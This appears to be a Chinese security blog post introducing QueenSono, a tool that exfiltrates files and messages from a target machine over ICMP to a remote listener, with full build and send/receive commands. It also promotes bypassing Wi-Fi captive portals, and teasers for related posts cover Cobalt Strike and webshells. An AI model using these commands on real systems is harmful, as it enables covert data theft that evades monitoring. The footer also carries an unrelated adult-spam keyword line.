<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    如何使用QueenSono從ICMP提取數據

    VSole2021-10-20 16:52:33

    關于QueenSono

    QueenSono是一款針對ICMP協議的數據提取工具,該工具基于Golang開發,并且只依賴于ICMP協議不受監控這一事實實現其功能。除此之外,該工具也可以用于基本的ICMP檢查,或繞過某些身份驗證機制,比如說許多公共Wi-Fi在連接到Wi-Fi(如機場Wi-Fi)后用于對用戶進行身份驗證。

    工具安裝

    從源碼安裝

    廣大研究人員可以直接使用下列命令將該項目源碼克隆至本地,并安裝好該工具所需的依賴組件:

    git clone https://github.com/ariary/QueenSono.gitmake before.build
    

    下列命令可以構建ICMP包發送器-qssender:

    build.queensono-sender
    

    下列命令可以構建ICMP包接收器-qsreceiver:

    build.queensono-receiver
    

    工具使用

    ICMP包發送器-qssender將負責把ICMP數據包發送至監聽器,因此我們需要將qssender源碼傳輸到目標設備上。

    ICMP包接收器-qsreceiver就是我們本地設備上的數據包監聽器了。

    所有的命令和工具參數都可以使用“—help”來查看。

    工具使用樣例1:發送包攜帶“ACK”

    在這個例子中,我們將發送一個大型文件,并查看接收到數據包之后的回復信息:

    在本地設備上,運行下列命令:

    $ qsreceiver receive -l 0.0.0.0 -p -f received_bible.txt
    

    參數解釋:

    -l 0.0.0.0:監聽所有接口的ICMP數據包
    -f received_bible.txt:將接收到的數據存儲至文件
    -p:顯示接收數據的進度條

    在目標設備上,運行下列命令:

    $ wget https://raw.githubusercontent.com/mxw/grmr/master/src/finaltests/bible.txt #download a huge file (for the example)$ qssender send file -d 2 -l 127.0.0.1 -r 10.0.0.92 -s 50000 bible.txt
    

    參數解釋:

    send file:發送文件
    -d 2:每兩秒發送一個數據包
    -l 127.0.0.1:每次接收回復信息的監聽地址
    -r 10.0.0.92:運行了qsreceiver 監聽器的遠程設備地址
    -s 50000:每個數據包需要發送的數據量大小

    工具使用樣例2:發送包不攜帶“ACK”

    在這個例子中,我們希望在不等待回復信息的情況下發送數據:

    在本地設備上,運行下列命令:

    $ qsreceiver receive truncated 1 -l 0.0.0.0
    

    參數解釋:

    receive truncated 1:如果沒有收到所有數據包,則不會無限期等待


    在目標設備上,運行下列命令:

    $ qssender send "thisisatest i want to send a string w/o waiting for the echo reply" -d 1 -l 127.0.0.1 -r 10.0.0.190 -s 1 -N
    

    參數解釋:

    -N:無回復選項

    工具使用樣例3:發送加密數據

    在這個例子中,我們將發送加密消息。由于命令行可能會被監控,因此我們將使用非對稱加密(防止密鑰泄露):

    在本地設備上,運行下列命令:

    $ qsreceiver receive -l 0.0.0.0 --encrypt<OUTPUT PUBLIC KEY>
    

    參數解釋:

    —encrypt:使用加密交換,它將生成公鑰/私鑰。公鑰將用于qssender加密數據,私鑰將用于接收器解密數據


    在目標設備上,運行下列命令:

    $ export MSG="<your message>"$ export KEY="<public_key_from_qsreceiver_output>"$ qssender send $MSG -d 1 -l 127.0.0.1 -r 10.0.0.190 -s 5 --key $KEY
    

    參數解釋:

    —key:提供數據加密的密鑰

    項目地址

    QueenSono:【點擊閱讀原文】

    參考資料

    https://github.com/ariary/QueenSono/tree/main/hack?

    icmp監聽器
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    關于QueenSonoQueenSono是一款針對ICMP協議的數據提取工具,該工具基于Golang開發,并且只依賴于ICMP協議不受監控這一事實實現其功能。除此之外,該工具也可以用于基本的ICMP檢查,或繞過某些身份驗證機制,比如說許多公共Wi-Fi在連接到Wi-Fi后用于對用戶進行身份驗證。工具安裝從源碼安裝廣大研究人員可以直接使用下列命令將該項目源碼克隆至本地
    突破安全策略上線CS
    2021-10-29 08:09:17
    0x01 環境簡述&說明web打點getshell,webshell是冰蝎,權限為.net,權限很低,服務器為server 2016,目標不出網!0x02 為什么要上線cswebshell權限太低,限制性大,需要上線cs提權,因為cs是采用反射dll來加載pe程序,從而在執行一些敏感操作的時候能起到一定的bypass作用,例如mimikatz抓密碼等操作。
    #默認情況下,payload_inject執行之后會在本地產生一個新的handler,由于已經有了一個不需要再產生一個,所以這里設置為true. #這里是當前獲得的session的id. 可以看到 cs 成功接收到 shell右鍵 Interact 調出 beacon 界面,net view 查看當前域中計算機列表,然后執行 shell 命令前面加上 shell 就可以了,例如 shell ipconfig四、制作木馬首先創建監聽器用于木馬回連,Host 為 cs 服務端的 ipAttacks->Packages->Windows Executable?需要派生的目標右擊選擇Spawn,然后創建一個?
    因為 web 服務器同時連接了外網和內網,所以必須首先拿下。這里有關 web 服務器的滲透不展開講了,無非也就是利用漏洞,諸如:弱口令、上傳漏洞、遠程代碼執行、各種 cms 漏洞,總之都是可以找到寫入 webshell 的方法。成功寫入 webshell 后,接著就要上傳木馬控制 web 服務器,這里可以用 Metasploit或 Cobaltstrike。
    隧道與端口轉發
    2021-11-18 08:26:13
    如果想獲得課程報名資格,請添加文末小助手微信咨詢。查看是否禁止了出站ip或者禁止了出站端口或者禁止了出站協議。情況1:目標禁止出站ip如果目標主機設置了嚴格的策略,防火墻只允許目標內網機器主動連接公網指定的ip。這樣的話,沒法反彈shell。情況2:禁止出站端口Linux系統使用Linux系統自帶命令探測出網端口。
    藍隊初級防護總結
    2023-01-09 10:11:55
    三. 網站被上傳webshell如何處理?工具方面比如使用D盾webshellkill,河馬webshell查殺,百度在線webshell查殺等工具對網站目錄進行排查查殺,如果是在護網期間可以將樣本備份再進行查殺。堡壘機是針對內部運維人員的運維安全審計系統。WAFWAF是以網站或應用系統為核心的安全產品,通過對HTTP或HTTPS的Web攻擊行為進行分析并攔截,有效的降低網站安全風險。
    堡壘機是針對內部運維人員的運維安全審計系統。WAFWAF是以網站或應用系統為核心的安全產品,通過對HTTP或HTTPS的Web攻擊行為進行分析并攔截,有效的降低網站安全風險。設置賬戶鎖定策略,比如說登錄行為限制次數,達到次數后鎖定多長時間。
    Windows如果RDP連接上去,可以使用圖形化工具(如御劍)。如果是webshell,可以使用fscan、nmap。重命名Dir,方便后續操作。將客戶端配置刪除?服務端監聽地址?服務端儀表板的端口。log_level記錄的日志級別。執行命令等待frpc連接./frps?#是該條規則在服務端開放的端口號,待會兒用proxyfier連的端口
    2020年3月5日,美國蘭德公司發布報告《如何分析無人機構成的網絡威脅》,研究無人機快速增長對網絡安全造成的影響,然后為國土安全部應對這一威脅做出分析并提出建議。 報告探索了無人機快速增長對網絡安全影響的方法以及建模,特別關注當前的漏洞和未來的發展趨勢。報告提出了一些概念性方法,旨在對與無人機相關的網絡威脅進行列舉和分類,并探索對商業無人機威脅進行建模的潛在益處和挑戰。
    本文為內測第一周結束后內網學員的學習筆記,后續本公眾號會持續更新其他課程學員學習筆記。對課程感興趣,請添加文末小助手微信咨詢。0x01 MSF安裝和升級 最近mac本機和linux服務器上的msf在執行msfupdate命令以后都出現了不同程度的玄學問題,于是卸了重裝。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类